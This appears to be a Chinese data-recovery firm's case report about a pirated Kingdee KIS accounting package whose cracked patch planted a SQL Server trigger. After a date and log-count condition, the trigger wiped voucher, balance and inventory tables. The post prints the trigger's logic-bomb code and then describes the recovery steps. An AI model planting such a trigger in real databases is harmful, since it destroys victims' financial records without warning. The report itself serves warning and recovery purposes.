近日接到某客户电话描述,自己用的金蝶KIS 12.2/12.3 专业版, 上下载的盗版,
用了近1年,早上进公司发现数据全部被篡改
如图
【数据恢复故障描述】
客户的财务电脑被盗版补丁留下的后门入侵修改了所有数据,删除了所有备份! 这让该公司小弟和老板,和会计他们都无法交代啊!
使用破解版财务软件,破解者破解后内藏了后门,清空所有数据的触发器。用了1年时间后,后门触发器被激活,删除了所有 科目余额表、存货余额、存货往来明细账、修改了所有 总账凭证、业务凭证、会计科目、
【临时处理方法】
此时建议立即停止SQL服务,分离数据库源文件,复制拷贝备份处理!切勿重装金蝶软件,切勿重装SQLserver!!
如还原其他备份,需事先拷贝 事故后第一手文件,进行备份。不要用账套管理器进行备份,那样是没用的。
不要在使用该服务器,等待专业技术人员处理!
【数据恢复过程】
接到电话后,客户发来遭后门修改数据库文件,立即组织对数据库分析工作,发现数据库内有一个后门触发器 t_log_autoNumbe ,大致代码内容为:
if (@FGLCurrYear=2014 and @FGLCurrPeriod>=1) or (@FICCurrYear=2014 and @FICCurrPeriod>=1)
begin
if (@Flogdays>=15)
begin
TRUNCATE TABLE t_voucherEntry –删除总账凭证
TRUNCATE TABLE t_balance –删除科目余额表
if @FVersion=‘8.0‘ –版本大于8.0
TRUNCATE TABLE icstockbillEntry –删除存货出入库明细账
else
TRUNCATE TABLE t_cc_stockbillEntry –删除出入库存货明细账
drop trigger t_log_AutoNumber
end
end
GO
1.对故障盘进行全盘镜像,对mdf文件进行备份,防止二次造成破坏。
2.对镜像盘进行扫描重组,对删除的表进行字段分析。
3.对mdf进行底层数据分析,与表结构进行匹配。
4.通过程序的匹配,找到所有删除表的原始ID。
5.通过ID和新表结构,对数据进行提取,生成SQL 脚本。
6.把SQL脚本附加到新的数据库中。
7.把未删除的表的数据进行迁移。
【恢复结果】:发回给客户测试验收,反馈数据基本正确,能恢复这个程度,客户很满意!得到客户的极大好评。
【温馨提示】:使用破解版软件,危害很大。居心不良的破解者,可能会留下后门木马,删除修改数据,敲诈钱财。如果商用,请使用正版软件!
声明:本站部分文章及图片源自用户投稿,如本站任何资料有侵权请您尽早请联系jinwei@zod.com.cn进行处理,非常感谢!